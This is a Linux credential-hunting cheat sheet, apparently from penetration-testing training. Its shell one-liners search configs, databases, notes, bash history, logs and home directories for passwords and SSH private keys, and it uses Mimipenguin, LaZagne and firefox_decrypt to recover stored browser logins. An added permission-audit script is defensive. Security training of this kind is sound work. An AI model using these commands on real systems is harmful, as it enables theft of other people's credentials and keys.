Credential Hunting

Files

History

Memory

Key-Rings

Configs

Logs

Cache

Browser stored credentials

Databases

Command-line History

In-memory Processing

Notes

Scripts

Source codes

Cronjobs

SSH Keys

Files

Configuration Files

  • Usually end in .conf, .cnf, .config

cry0l1t3@unixclient:~$ for l in .conf .config .cnf; do echo -e "\nFile extension: $l"; find / -name "*$l" 2>/dev/null | grep -v "lib\|fonts\|share\|core"; done
cry0l1t3@unixclient:~$ for i in $(find / -name "*.cnf" 2>/dev/null | grep -v "doc\|lib"); do echo -e "\nFile: $i"; grep "user\|password\|pass" "$i" 2>/dev/null | grep -v "#"; done

Databases

cry0l1t3@unixclient:~$ for l in .sql .db ".*db" ".db*"; do echo -e "\nDB File extension: $l"; find / -name "*$l" 2>/dev/null | grep -v "doc\|lib\|headers\|share\|man"; done

Notes

cry0l1t3@unixclient:~$ find /home/* -type f \( -name "*.txt" -o ! -name "*.*" \) 2>/dev/null

Scripts


Cronjobs


SSH Keys

Private Keys

cry0l1t3@unixclient:~$ grep -rnw "PRIVATE KEY" /home/* 2>/dev/null | grep ":1:"

Public Keys

cry0l1t3@unixclient:~$ grep -rnw "ssh-rsa" /home/* 2>/dev/null | grep ":1:"
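The config-file and SSH-key hunts above become a hardening check once a permission test is added: the files worth fixing are the ones a non-owner account could read. The following is an added example, not part of the original cheat sheet: a POSIX shell function (the names audit_exposed_secrets and make_sample_tree, and the password-setting pattern, are this example's own assumptions) that reports private keys and password-bearing configs under the given directories that are readable by group or others, run against a constructed sample tree.

```shell
# Added example, not from the original cheat sheet. Reports every regular file
# under DIR... that is readable by group or others AND that either starts with
# a "PRIVATE KEY" marker (what the grep -rnw ... ":1:" hunt finds) or carries an
# uncommented password=/passwd= setting (what the .cnf hunt finds).
# Fix: chmod 600, and rotate any key or password that was already exposed.
audit_exposed_secrets() {
    # -perm -040 / -perm -004: group read bit / other read bit set (octal mask).
    find "$@" -type f \( -perm -040 -o -perm -004 \) 2>/dev/null |
    while IFS= read -r f; do
        if head -n 1 "$f" 2>/dev/null | grep -q "PRIVATE KEY"; then
            echo "$f"
        elif grep -qiE '^[^#]*(password|passwd)[[:space:]]*=' "$f" 2>/dev/null; then
            echo "$f"
        fi
    done
}

# Constructed sample tree (not real data) so the audit runs stand-alone.
# Prints the directory it created.
make_sample_tree() {
    d=$(mktemp -d)
    mkdir -p "$d/.ssh" "$d/app"
    printf '%s\n' '-----BEGIN OPENSSH PRIVATE KEY-----' 'constructed' > "$d/.ssh/id_ed25519"
    chmod 600 "$d/.ssh/id_ed25519"                 # owner-only key: not reported
    printf '%s\n' '-----BEGIN RSA PRIVATE KEY-----' 'constructed' > "$d/.ssh/backup.pem"
    chmod 644 "$d/.ssh/backup.pem"                 # world-readable key: reported
    printf '%s\n' 'user = app' 'password = constructed-secret' > "$d/app/db.cnf"
    chmod 640 "$d/app/db.cnf"                      # group-readable password: reported
    printf '%s\n' '# password = placeholder' 'host = localhost' > "$d/app/app.conf"
    chmod 644 "$d/app/app.conf"                    # only a commented setting: not reported
    printf '%s\n' 'shopping list' > "$d/notes.txt" # no secret: not reported
    echo "$d"
}

# Stand-alone run: build the sample tree, audit it, clean up.
SAMPLE=$(make_sample_tree)
audit_exposed_secrets "$SAMPLE"
rm -rf "$SAMPLE"
```

Point it at /home, /etc and application directories on a real host; on a multi-user system a non-empty result is the list of files the hunting commands above would have handed to another local user.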

History

Bash History

cry0l1t3@unixclient:~$ tail -n5 /home/*/.bash*

Logs

  • Application Logs, Event Logs, Service Logs, System Logs

/var/log/messages     Generic system activity logs.
/var/log/syslog       Generic system activity logs.
/var/log/auth.log     (Debian) All authentication related logs.
/var/log/secure       (RedHat/CentOS) All authentication related logs.
/var/log/boot.log     Booting information.
/var/log/dmesg        Hardware and drivers related information and logs.
/var/log/kern.log     Kernel related warnings, errors and logs.
/var/log/faillog      Failed login attempts.
/var/log/cron         Information related to cron jobs.
/var/log/mail.log     All mail server related logs.
/var/log/httpd        All Apache related logs.
/var/log/mysqld.log   All MySQL server related logs.

cry0l1t3@unixclient:~$ PAT="accepted\|session opened\|session closed\|failure\|failed\|ssh\|password changed\|new user\|delete user\|sudo\|COMMAND=\|logs"; for i in /var/log/* /var/log/*/*; do [ -f "$i" ] && GREP=$(grep "$PAT" "$i" 2>/dev/null) && echo -e "\n#### Log file: $i" && echo "$GREP"; done

Memory and Cache

Mimipenguin (requires root)

LaZagne

Browsers

Firefox Stored Credentials

$ ls -l .mozilla/firefox/ | grep default 

Decrypting Firefox Stored Credentials

$ git clone https://github.com/unode/firefox_decrypt.git
$ python3.9 firefox_decrypt/firefox_decrypt.py

Using LaZagne

$ python3 laZagne.py browsers
